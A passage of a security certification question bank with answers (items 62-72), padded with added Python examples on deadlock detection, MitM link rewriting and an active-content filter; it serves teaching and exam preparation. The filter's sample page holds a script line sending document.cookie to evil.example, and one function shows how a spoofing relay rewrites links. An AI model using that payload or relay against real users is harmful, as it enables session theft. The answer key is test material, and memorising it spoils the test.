62. c. Layered security protections (defense-in-depth) can be installed to prevent exploitability. Architectural system design can also help prevent exploitability. Layered security protections include least privilege, object reuse, process separation, modularity, and trusted systems. The other three choices do not provide the best remedy.
63. For the payment card industry data security standard (PCI-DSS), which of the following security controls cannot meet the control objectives of building and maintaining a secure network?
a. Install firewall configurations.
b. Do not use defaults for system passwords.
c. Encrypt transmission of cardholder data.
d. Do not use defaults for security parameters.
63. c. The encryption of transmission of cardholder data across open, public networks meets a different control objective of protecting cardholder data, not the control objective of building and maintaining a secure network. The other three choices meet the objective of building and maintaining a secure network.
64. For the payment card industry data security standard (PCI-DSS), which of the following security controls cannot meet the control objective of maintaining a vulnerability management program?
a. Regularly update antivirus software.
b. Protect stored cardholder data.
c. Maintain secure operating systems.
d. Maintain secure application systems.
64. b. Protecting stored cardholder data meets a different control objective, protecting cardholder data, not the one in the question. The other three choices meet the control objective of maintaining a vulnerability management program.
65. Use of cookies on the Web raises which of the following?
a. Integrity issue
b. Privacy issue
c. Connectivity issue
d. Accountability issue
65. b. Cookies were invented to enable websites to remember their users from visit to visit. Because cookies collect personal information about the Web user, they raise privacy issues such as what information is collected and how it is used. Cookies do not raise integrity, connectivity, or accountability issues.
66. Which of the following is not a risk by itself for a Structured Query Language (SQL) server?
a. Concurrent transactions
b. Deadlock
c. Denial-of-service
d. Loss of data integrity
66. a. Concurrent transactions are not a risk by themselves. The SQL server must ensure orderly access to data when concurrent transactions attempt to access and modify the same data. The SQL server must provide appropriate transaction management features to ensure that tables and elements within the tables are synchronized. The other three choices are risks that result from mishandling concurrent transactions.
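To make the distinction in answer 66 concrete, the following is an added example (not part of the original question bank): a toy lock manager showing why concurrent transactions are a risk only when the server mishandles them. Two transactions touch the same rows in opposite order; without deadlock handling each waits on the other forever. The manager keeps a wait-for graph, detects the cycle and aborts a victim, and the same work done in a consistent lock order never deadlocks at all. The class and function names and the two schedules are illustrative and are not any real DBMS's API.

```python
"""Toy lock manager with wait-for-graph deadlock detection (illustrative only)."""
from collections import defaultdict, deque


class Deadlock(Exception):
    pass


class LockManager:
    def __init__(self):
        self.owner = {}                     # row -> transaction holding its exclusive lock
        self.waits_for = defaultdict(set)   # transaction -> transactions it is blocked on

    def _cycle_through(self, start):
        """Depth-first walk of the wait-for graph: a path back to start is a deadlock."""
        stack, seen = [start], set()
        while stack:
            txn = stack.pop()
            for blocker in self.waits_for[txn]:
                if blocker == start:
                    return True
                if blocker not in seen:
                    seen.add(blocker)
                    stack.append(blocker)
        return False

    def acquire(self, txn, row):
        """True if txn now holds row; False if it must wait; Deadlock if waiting is futile."""
        holder = self.owner.get(row)
        if holder is None or holder == txn:
            self.owner[row] = txn
            return True
        self.waits_for[txn].add(holder)
        if self._cycle_through(txn):
            self.waits_for[txn].discard(holder)
            raise Deadlock(f"{txn} -> {holder} -> ... -> {txn}")
        return False

    def release_all(self, txn):
        """Commit or abort: drop every lock txn holds and every edge pointing at it."""
        for row in [r for r, t in self.owner.items() if t == txn]:
            del self.owner[row]
        self.waits_for.pop(txn, None)
        for blockers in self.waits_for.values():
            blockers.discard(txn)


def run_schedule(steps):
    """Run interleaved lock requests [(txn, row), ...] in the given order.

    A request that cannot be granted is retried after the others (the holder
    may commit meanwhile); a detected deadlock aborts the requester, which is
    the victim. Returns (committed, aborted)."""
    lm = LockManager()
    pending = deque(steps)
    remaining = defaultdict(int)         # statements each transaction still has to run
    for txn, _ in steps:
        remaining[txn] += 1
    committed, aborted = set(), set()
    while pending:
        txn, row = pending.popleft()
        if txn in aborted:
            continue
        try:
            granted = lm.acquire(txn, row)
        except Deadlock:
            aborted.add(txn)
            lm.release_all(txn)
            continue
        if not granted:
            pending.append((txn, row))   # wait: the holder may commit before the retry
            continue
        remaining[txn] -= 1
        if remaining[txn] == 0:          # last statement done: commit and free the rows
            committed.add(txn)
            lm.release_all(txn)
    return committed, aborted


# Constructed schedules: T1 and T2 each update rows A and B.
DEADLOCK_SCHEDULE = [("T1", "A"), ("T2", "B"), ("T1", "B"), ("T2", "A")]   # opposite order
ORDERED_SCHEDULE = [("T1", "A"), ("T2", "A"), ("T1", "B"), ("T2", "B")]    # both lock A before B

if __name__ == "__main__":
    print("opposite order:", run_schedule(DEADLOCK_SCHEDULE))   # T1 commits, T2 is the victim
    print("consistent order:", run_schedule(ORDERED_SCHEDULE))  # both commit, nobody waits forever
```

The two schedules do identical work; only the interleaving differs. Detection plus victim abort is the transaction-management feature answer 66 alludes to, and a consistent lock order removes the deadlock entirely. Without either, the server delivers the other three choices: transactions that hang (denial of service) or, if it gives up on locking, interleaved writes that corrupt rows (loss of integrity).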
67. System assurance cannot be increased by which of the following?
a. Applying more complex technical solutions
b. Using more trustworthy components
c. Limiting the extent of a vulnerability
d. Installing nontechnical countermeasures
67. a. System assurance is grounds for confidence that an entity meets its security objectives as well as system characteristics that enable confidence that the system fulfills its intended purpose. Applying more complex technical solutions can create more complexity in implementing security controls. Simple solutions are better. The other three choices can increase system assurance.
68. Which of the following security services are applicable to the confidentiality security objective?
a. Prevention services
b. Detection services
c. Correction services
d. Recovery services
68. a. Only the prevention services are needed to maintain the confidentiality security objective. When lost, confidentiality cannot be restored. The other three choices do not apply to the confidentiality security objective.
69. The security services that provide for availability security objectives also provide for which of the following security objectives?
a. Integrity
b. Confidentiality
c. Accountability
d. Assurance
69. a. Examples of common security services between availability and integrity objectives include access authorization and access control enforcement.
The primary availability services are those that directly impact the ability of the system to maintain operational effectiveness. One aspect of maintaining operational effectiveness is protection from unauthorized changes or deletions by defining authorized access and enforcing access controls. Operational effectiveness is also maintained by detecting intrusions, detecting loss of wholeness, and providing the means of returning to a secure state.
The services that provide for availability also provide for integrity. This is because maintaining or restoring system integrity is an essential part of maintaining system availability.
By definition, integrity is the property that protected and sensitive data has not been modified or deleted in an unauthorized and undetected manner. By definition, availability means ensuring timely and reliable access to and use of data and information by authorized users. How is the data available to authorized users if it was deleted or destroyed?
The security services that fulfill the confidentiality, accountability, and assurance objectives do not overlap with the availability services in this way.
70. Web spoofing using the man-in-the-middle attack is an example of which of the following?
a. Browser-oriented attacks
b. Server-oriented attacks
c. Network-oriented attacks
d. User-oriented attacks
70. c. An attacker can gain information by masquerading as a Web server using a man-in-the-middle (MitM) attack, whereby requests and responses are conveyed via the imposter as a watchful intermediary. Such a Web spoofing attack enables the imposter to shadow not only a single targeted server, but also every subsequent server accessed on the network.
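The following is an added example (not part of the original question bank) of the mechanism behind the phrase "shadow every subsequent server": the imposter relays the real page but rewrites each absolute link so the victim's next request also goes through it. It also shows the inspection a gateway proxy or browser extension can apply: a link whose path is itself an encoded absolute URL is the fingerprint of such a relay. The hosts (real-bank.example, imposter.example) and the sample page are constructed, and the rewriting scheme is one simple form of the technique, not a description of any particular tool.

```python
"""Link rewriting by a web-spoofing intermediary, and a check for it (illustrative only)."""
import re
from urllib.parse import quote, unquote, urlparse

# Absolute URLs in the attributes that drive the browser's next request.
LINK_RE = re.compile(r'\b(href|src|action)="(https?://[^"]+)"')


def rewrite_links(page, imposter_host):
    """What the imposter does to every relayed page: each real URL becomes
    https://<imposter>/<percent-encoded real URL>, so the link still works
    for the victim but resolves to the imposter."""
    def reroute(match):
        attr, real_url = match.group(1), match.group(2)
        return f'{attr}="https://{imposter_host}/{quote(real_url, safe="")}"'
    return LINK_RE.sub(reroute, page)


def forward_target(url):
    """The real URL the imposter must fetch when the victim follows a rewritten link."""
    return unquote(urlparse(url).path.lstrip("/"))


def link_hosts(page):
    return [urlparse(url).hostname for _, url in LINK_RE.findall(page)]


def find_funneled_links(page):
    """Inspection step: links whose path decodes to another absolute URL.
    Returns [(link as served, embedded real target), ...]; empty for a
    page whose links point where they say they do."""
    funneled = []
    for _, url in LINK_RE.findall(page):
        target = forward_target(url)
        if target.startswith(("http://", "https://")):
            funneled.append((url, target))
    return funneled


# Constructed page as the real site would serve it (hypothetical hosts).
ORIGINAL_PAGE = (
    '<a href="https://real-bank.example/login">Log in</a>\n'
    '<img src="https://cdn.real-bank.example/logo.png">\n'
    '<form action="https://real-bank.example/transfer"></form>'
)

if __name__ == "__main__":
    relayed = rewrite_links(ORIGINAL_PAGE, "imposter.example")
    print(relayed)
    print(sorted(set(link_hosts(ORIGINAL_PAGE))))   # the two real hosts
    print(sorted(set(link_hosts(relayed))))         # only imposter.example
    for served, real in find_funneled_links(relayed):
        print(served, "->", real)
```

After one relayed page every link, image and form on it resolves to the imposter, which is why a single initial misdirection is enough to shadow each server the victim visits afterwards. The check catches only this naive rewriting; an intermediary that maps real URLs to opaque tokens leaves no embedded URL to find, so the check complements, rather than replaces, verifying the server's certificate and the address actually in use.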
71. To mitigate the risks of using active content, which of the following is an example of a technical safeguard?
a. Filters
b. Incident response handling
c. Security policy
d. Risk analysis
71. a. Filters can examine program code at points of entry and block or disable it if deemed harmful. Examples of filters include ingress filtering, egress filtering, and intrusion detection systems. The other three choices are examples of management and operational safeguards (controls).
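As an added example (not part of the original question bank) of the kind of filter answer 71 describes, the code below sits at a point of entry such as a web gateway and examines a page before it reaches the browser. It rebuilds the HTML while dropping active content: script, object, embed, applet and iframe elements with their bodies, on* event-handler attributes, and javascript: URLs, and it records what it blocked so the gateway can log it. The sample page is constructed; the class is a demonstration of the technique, not a complete sanitizer.

```python
"""Gateway filter that strips active content from HTML (illustrative only)."""
from html import escape
from html.parser import HTMLParser

ACTIVE_TAGS = {"script", "object", "embed", "applet", "iframe"}


class ActiveContentFilter(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)   # pass entities through untouched
        self.out = []        # filtered page, as fragments
        self.blocked = []    # what was removed, for the gateway log
        self._skip = 0       # > 0 while inside an active-content element

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self._skip += 1
            self.blocked.append(f"<{tag}>")
            return
        if self._skip:
            return
        kept = []
        for name, value in attrs:          # HTMLParser lowercases attribute names
            if name.startswith("on"):
                self.blocked.append(f"{tag}@{name}")
            elif value is not None and value.strip().lower().startswith("javascript:"):
                self.blocked.append(f"{tag}@{name}={value}")
            elif value is None:
                kept.append(f" {name}")
            else:
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):   # <embed ... /> and friends
        if tag in ACTIVE_TAGS:
            self.blocked.append(f"<{tag}/>")
            return
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS:
            self._skip = max(0, self._skip - 1)
            return
        if not self._skip:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:                 # script bodies arrive here and are dropped
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._skip:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._skip:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.blocked.append("<!--...-->")   # comments can hide conditional content; drop them


def filter_active_content(page):
    """Return (filtered_html, blocked_items)."""
    f = ActiveContentFilter()
    f.feed(page)
    f.close()
    return "".join(f.out), f.blocked


# Constructed page mixing harmless markup with three kinds of active content.
SAMPLE_PAGE = (
    '<p onclick="steal()">Hello <b>world</b> &amp; friends</p>'
    '<script>document.location="https://evil.example/?c="+document.cookie</script>'
    '<a href="javascript:alert(1)">click</a>'
    '<img src="/logo.png" alt="logo">'
)

if __name__ == "__main__":
    cleaned, blocked = filter_active_content(SAMPLE_PAGE)
    print(cleaned)
    print("blocked:", blocked)
```

The filter is deliberately an allow-by-reconstruction design: it emits only what it parsed and understood, rather than searching the raw text for bad strings, which is what lets it drop a script body wholesale instead of trying to pattern-match it. An IDS-style filter on the same gateway would keep the page intact and raise an alert from the `blocked` list instead; the choice between blocking and alerting is policy, but the examination step is the same.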
72. To mitigate the risks of using active content, which of the following is an example of a technical safeguard?
a. Security audit
b. Evaluated technology
c. Application settings
d. Software cages